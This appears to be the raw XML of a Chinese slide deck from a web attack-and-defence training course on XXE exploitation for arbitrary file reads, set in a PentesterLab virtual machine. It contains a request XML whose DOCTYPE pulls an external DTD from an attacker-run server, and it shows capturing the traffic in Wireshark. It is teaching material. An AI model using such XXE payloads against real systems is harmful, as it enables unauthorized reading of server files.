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sldIdLst>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="295" r:id="rId14"/>
    <p:sldId id="26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1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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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6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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110355" y="3343275"/>
            <a:ext cx="7045325" cy="10636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攻防 训练营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47" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5281930" y="4406900"/>
            <a:ext cx="6191250" cy="850900"/>
          </a:xfrm>
        </p:spPr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smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XXE漏洞利用  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a: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任意文件读取</a:t>
            </a:r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74676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服务器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dtd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2000" y="119062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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中内容设置为下图的文件内容。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0" y="1960880"/>
            <a:ext cx="9940925" cy="12541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62000" y="356298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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>抓取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>包查看信息。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661035"/>
            <a:ext cx="11503025" cy="553593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1927860" y="2855595"/>
            <a:ext cx="2616200" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="2616200" cy="148907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274888"/>
              <a:ext cx="2601912" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="2601912" cy="549275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71963" y="2081213"/>
                <a:ext cx="2032000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环境搭建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241993"/>
              <a:ext cx="203200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 测试原理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6572568" y="2885758"/>
            <a:ext cx="2878455" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="2878456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2129791" cy="953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请求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XML</a:t>
              </a:r>
              <a:endPara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pPr algn="l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83150" y="5049838"/>
              <a:ext cx="2294256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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc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服务器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dtd</a:t>
              </a:r>
              <a:endPara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3325"/>
            <a:ext cx="4281487" cy="706755"/>
            <a:chOff x="3875085" y="1202601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5373580" y="1202601"/>
              <a:ext cx="1198659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总结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b="1" smtClean="0"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699" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836013" y="3790950"/>
            <a:ext cx="4516436" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>欢迎关注  </a:t>
            </a:r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安全 训练营课程</a:t>
            </a:r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1927860" y="2855595"/>
            <a:ext cx="2616200" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="2616200" cy="148907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274888"/>
              <a:ext cx="2601912" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="2601912" cy="549275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71963" y="2081213"/>
                <a:ext cx="2032000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环境搭建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241993"/>
              <a:ext cx="203200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 测试原理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6572568" y="2885758"/>
            <a:ext cx="2878455" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="2878456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2129791" cy="953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请求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XML</a:t>
              </a:r>
              <a:endPara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pPr algn="l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83150" y="5049838"/>
              <a:ext cx="2294256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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc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服务器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dtd</a:t>
              </a:r>
              <a:endPara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3325"/>
            <a:ext cx="4281487" cy="706755"/>
            <a:chOff x="3875085" y="1202601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4954557" y="1202601"/>
              <a:ext cx="2214471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课程内容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327400" y="3163570"/>
            <a:ext cx="553720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环境搭建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635" y="62420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环境搭建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80770" y="1346200"/>
            <a:ext cx="106006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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中新建虚拟机，加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>镜像即可。 默认用户名和密码 都是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentestlab</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下载地址：https://isos.pentesterlab.com/play_xxe.iso</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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29535" y="1991360"/>
            <a:ext cx="6867525" cy="41719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758565" y="3163570"/>
            <a:ext cx="467487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测试原理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21970" y="633730"/>
            <a:ext cx="10600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测试原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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28595" y="1586230"/>
            <a:ext cx="6667500" cy="47815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2846705" y="3081655"/>
            <a:ext cx="649859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请求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XML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73850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请求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XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2000" y="1405255"/>
            <a:ext cx="867283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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo SYSTEM "http://192.168.1.103/test.dtd"&gt;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&lt;foo&gt;&amp;e1;&lt;/foo&gt;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9625" y="2965450"/>
            <a:ext cx="10573385" cy="34143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04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526790" y="3081020"/>
            <a:ext cx="513842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服务器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dtd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10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1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2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4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5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35"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="35"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="0"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="endPage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5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1"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="1"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="0"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="title"/>
  <p:tag name="KSO_WM_TEMPLATE_THUMBS_INDEX" val="1、5、6、7、8、11、13、14、17、20、25、35"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag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9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395</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>67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宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Yu Gothic UI Semibold</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>Web攻防 训练营</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>环境搭建</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>测试原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>请求XML</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>服务器dtd</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>再见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1414395541</cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-19T05:45:40Z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2052-11.1.0.8013</vt:lpwstr>
  </property>
</Properties>
</file>